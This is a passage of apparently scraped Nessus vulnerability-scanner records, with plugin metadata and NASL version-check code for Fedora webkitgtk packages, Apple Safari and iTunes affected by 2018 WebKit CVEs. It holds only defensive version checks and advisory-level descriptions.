[CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-118b9abf99\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"webkit2gtk3-2.20.3-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:47:29", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4190), [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4199), [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4218), [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4222), [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4232), [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4233), [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4246), [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-02T00:00:00", "type": "nessus", "title": "Fedora 27 : webkitgtk4 (2018-aac3ca8936)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-AAC3CA8936.NASL", "href": "https://www.tenable.com/plugins/nessus/110823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-aac3ca8936.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110823);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_xref(name:\"FEDORA\", value:\"2018-aac3ca8936\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2018-aac3ca8936)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-aac3ca8936\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.20.3-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-10T20:37:20", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1.1 It is, therefore, affected by multiple vulnerabilities.\n\n- A remote code execution vulnerability exists in WebKit due to improper memory handling.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page to to execute arbitrary code or cause a denial of service (CVE-2018-4199, CVE-2018-4201, CVE-2018-4218, CVE-2018-4233).\n\n- An information disclosure vulnerability exists in WebKit. An unauthenticated, remote attacker can exploit this, via a specifically crafted web page, to disclose potentially sensitive information (CVE-2018-4190).\n\n- An out-of-bounds read error exists in WebKit due to improper input validation.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page that leverages a getWasmBufferFromValue during WebAssembly compilation to execute arbitrary code (CVE-2018-4222).", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-02T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 11.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4199", "CVE-2018-4201", "CVE-2018-4205", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246", "CVE-2018-4247", "CVE-2018-4277"], "modified": "2019-07-05T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI11_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/126381", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126381);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/07/05 9:53:32\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4201\",\n \"CVE-2018-4205\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\",\n \"CVE-2018-4247\",\n \"CVE-2018-4277\"\n );\n script_bugtraq_id(104358, 104366);\n\n script_name(english:\"macOS : Apple Safari < 11.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1.1 It is, therefore,\naffected by multiple vulnerabilities.\n\n- A remote code execution vulnerability exists in WebKit due to improper memory handling.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted\n web page to to execute arbitrary code or cause a denial of service\n (CVE-2018-4199, CVE-2018-4201, CVE-2018-4218, CVE-2018-4233).\n\n- An information disclosure vulnerability exists in WebKit. An unauthenticated,\n remote attacker can exploit this, via a specifically crafted web page,\n to disclose potentially sensitive information (CVE-2018-4190).\n\n- An out-of-bounds read error exists in WebKit due to improper input validation.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page\n that leverages a getWasmBufferFromValue during WebAssembly compilation to execute arbitrary\n code (CVE-2018-4222).\n\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208854\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '11.1.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:43:20", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.5. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.5 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2019-11-04T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_5.NASL", "href": "https://www.tenable.com/plugins/nessus/110384", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110384);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\"\n );\n script_bugtraq_id(103961, 104378);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-06-01-7\");\n\n script_name(english:\"Apple iTunes < 12.7.5 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208852\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?375c8685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4246\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.5\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:44:28", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.5. It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.5 Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2019-11-04T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_5_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/110383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110383);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\"\n );\n script_bugtraq_id(103961, 104378);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-06-01-7\");\n\n script_name(english:\"Apple iTunes < 12.7.5 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208852\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?375c8685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4246\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.5\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-25T17:30:39", "description": "The version of Apple iOS running on the mobile device is 